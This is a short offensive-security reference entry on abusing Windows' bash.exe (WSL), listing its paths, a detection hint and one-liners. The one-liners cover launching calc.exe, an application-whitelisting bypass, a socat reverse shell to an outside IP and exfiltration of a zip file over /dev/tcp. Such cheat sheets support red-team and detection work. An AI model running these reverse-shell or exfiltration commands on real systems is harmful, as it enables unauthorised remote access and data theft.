~/Privilege Escalation/Windows/Binaries# cat Bash.exe.md

File used by Windows subsystem for Linux

Paths:

C:\Windows\System32\bash.exe
C:\Windows\SysWOW64\bash.exe

Detection: Child process from bash.exe

Execute

Executes calc.exe from bash.exe

bash.exe -c calc.exe

Executes a reverseshell

bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"

Exfiltrate data

bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'

AWL bypass

Executes calc.exe from bash.exe

bash.exe -c calc.exe